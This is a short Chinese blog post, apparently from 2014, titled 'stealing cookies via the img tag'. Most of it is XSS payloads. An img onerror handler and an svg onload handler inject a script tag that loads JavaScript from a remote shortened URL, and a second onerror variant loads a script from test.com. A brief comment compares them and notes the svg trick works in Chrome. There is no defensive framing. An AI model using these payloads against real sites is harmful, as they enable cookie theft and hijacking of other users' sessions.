img 标签窃取cookie

时间:2014-10-3    作者:admin    分类: 技术交流


<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'>

onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

原理差不多,都是通过事件调用js,第一个更短些~


chrome 下也可以通过<svg> 标签搞定,


<svg/onload=appendChild(createElement('script')).src='http://126.am/ia8Vp4'>

标签: img标签 xss 窃取cookies